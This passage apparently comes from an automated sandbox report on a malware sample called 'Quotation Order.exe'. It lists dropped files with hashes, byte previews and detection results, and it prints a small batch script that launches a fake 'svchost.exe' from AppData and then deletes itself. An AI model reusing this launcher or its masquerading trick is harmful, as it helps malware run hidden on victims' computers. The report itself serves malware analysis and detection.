                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_221ruj1r.qpy.ps1

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4oix3zxr.1uh.ps1

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e3dknjde.5km.psm1

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gl0pyc0l.cl5.ps1

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gzvqqcgh.pow.psm1

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kyrfe4mr.2th.ps1

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mjffcq45.v4n.ps1

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qeu4ouzg.b0w.psm1

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rpagqn43.zin.ps1

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vsl051qu.xd5.psm1

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wisdor4s.sz0.ps1

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wvk5dvvw.evp.psm1

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y0nndm0q.ihk.psm1

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zecufptb.wv0.psm1

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zn422gfw.hho.ps1

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\tmp25B.tmp.bat

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Quotation Order.exe
                                                                                                                                                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):148
                                                                                                                                                                                                                                                  Entropy (8bit):5.081953763814562
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:mKDDCMNqTtvL5oMEREaKC5ZACSmqRDMERE2J5xAInTRI9YiVZPy:hWKqTtT6FiaZ5Omq1Fi23fTNiVk
                                                                                                                                                                                                                                                  MD5:8B377DE6416079B56663F37C330EFB30
                                                                                                                                                                                                                                                  SHA1:0642BAFD929F221D37007B6F5DDBF2F45FAE4084
                                                                                                                                                                                                                                                  SHA-256:A4E772CAE0181A997339A7809408959AC44C9A76D9DEA94E5A080A6EFDD49610
                                                                                                                                                                                                                                                  SHA-512:169E8D95A6809F31D8301F586EB33CFD875118C42509A89C8919F8D25B5971F615BBE3BCDB1E84D97D7B0481F7B65FB678D5AE1DA49EF60EB7EEFCC5A623977F
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\svchost.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmp25B.tmp.bat" /f /q..

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                  Size (bytes):108664
                                                                                                                                                                                                                                                  Entropy (8bit):5.8959760602012965
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:QSF7vA1hRqHNxxMjlI3ZC+0CtOss6mdcQ6A4vhZ91RKGpQJN:nA1hYPMUs6mdclA4vhNRKG4N
                                                                                                                                                                                                                                                  MD5:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                                                                                                                                                  SHA1:8C68CA3F013C490161C0156EF359AF03594AE5E2
                                                                                                                                                                                                                                                  SHA-256:7D3BDB5B7EE9685C7C18C0C3272DA2A593F6C5C326F1EA67F22AAE27C57BA1E6
                                                                                                                                                                                                                                                  SHA-512:D7E49B361544BA22A0C66CF097E9D84DB4F3759FBCC20386251CAAC6DA80C591861C1468CB7A102EEE1A1F86C974086EBC61DE4027F9CD22AD06D63550400D6D
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                  • Filename: DHL-7654544CNT Pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.PWSX-gen.17424.6091.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: Draft Document 940465898900011174774000-PDF.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: DHL DETAILS.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: payment.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: New Order 7003153933.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Win32.TrojanX-gen.10939.30166.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: Purchase Order.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: CHEMICAL SPECIFICATION.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: Quotation.pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..X...........v... ........@.. ..............................O.....`.................................\v..O.......$............f..xB..........$u............................................... ............... ..H............text....V... ...X.................. ..`.rsrc...$............Z..............@..@.reloc...............d..............@..B.................v......H.......(...................xE..$t......................................2~P....o....*.r...p(....*VrK..p(....s.....P...*..0.._.......~....:O....>.....%.rm..p...A...s......su....%.r...p...A...s....rm..p.su....%.r...p...B...s......su....%.r...p...B...s....r...p.su....%.r...p...C...s......su....%.r...p...C...s....r...p.su....%.r...p...D...s......su....%.r...p...D...s....r...p.su....%.r...p...E...s......su....%..r...p...E...s....r...p.su....%..r...p...F...s......su....%..r...p...F

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\svchost.exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Quotation Order.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):912780
                                                                                                                                                                                                                                                  Entropy (8bit):7.719141613124118
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:4wzm9u/h4/YiCLuiq3crVdkwGdYCxUw/ATA:pmuhWYiCaivGWPwITA
                                                                                                                                                                                                                                                  MD5:D797AAE1EAF481E9C887482192B84109
                                                                                                                                                                                                                                                  SHA1:ACF58B4EB3F0FFDA9A2CD91DEF583422A11ED873
                                                                                                                                                                                                                                                  SHA-256:CBDA8606094D0493370B0F219EDABA9BE92444967AA9259D3E9323314DCA2DAA
                                                                                                                                                                                                                                                  SHA-512:605151432227A27E70C7884A7300E2CDA5450970A5BB67CB6139FB69EE1FACBE2DC95799905080456DB0549AA04E35870E4142AAFBCB60AA175F9526F3F7753C
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....k..........."...0.................. ....@...... ....................................`.........................................................................................B...8............................................................ ..H............text........ ...................... ..`.rsrc...............................@..@........................................H.......................................................................0.1.2.3.4.5.6.7.8.9.A.B.C.D.E.F.0.1.2.3.4.5.6.7.8.9.H.........(%.....3.. ....}....*.-...}....*..d...%.~&....('...s(...zR.(%....(......}....*:.(......}....*..{....*:.{.... ......*2.{....s....*.. ...._,2(*.....d...%.~&....('.........%...l....(-...s(...z*"..(=...*..{....*:.(......}....*2.{....._...*v..-..{......_+..{.....`}....*2.{....._...*v..-..{......_+..{.....`}....*2.{....._...*v..-..{......_+..{.....`}....*6.{

                                                                                                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                  Size (bytes):338
                                                                                                                                                                                                                                                  Entropy (8bit):3.4679554894199565
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:kKTSr87PiJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:LSrOkPlE99SCQl2DUevat
                                                                                                                                                                                                                                                  MD5:206FFE53D391FCA44F60892F6CA8CA10
                                                                                                                                                                                                                                                  SHA1:9BDE2FF7855CB848B7F729F8D7B850DD2CFFF282
                                                                                                                                                                                                                                                  SHA-256:8165D90C4E5C269F8EB1D8A6E29ED93B9E2AEB0F07970ED6659BFBE699A9D62E
                                                                                                                                                                                                                                                  SHA-512:23C36B63FA693A393C19005917B83C7CE7E4912E95D1BD4086822BE608654552F60F0829509EE90CF834E9B03780FED8D20477E923141D25F9745C4635DD3EAC
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:p...... .........*......(................................................4..... .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...

                                                                                                                                                                                                                                                  C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1835008
                                                                                                                                                                                                                                                  Entropy (8bit):4.296006462680174
                                                                                                                                                                                                                                                  Encrypted:false
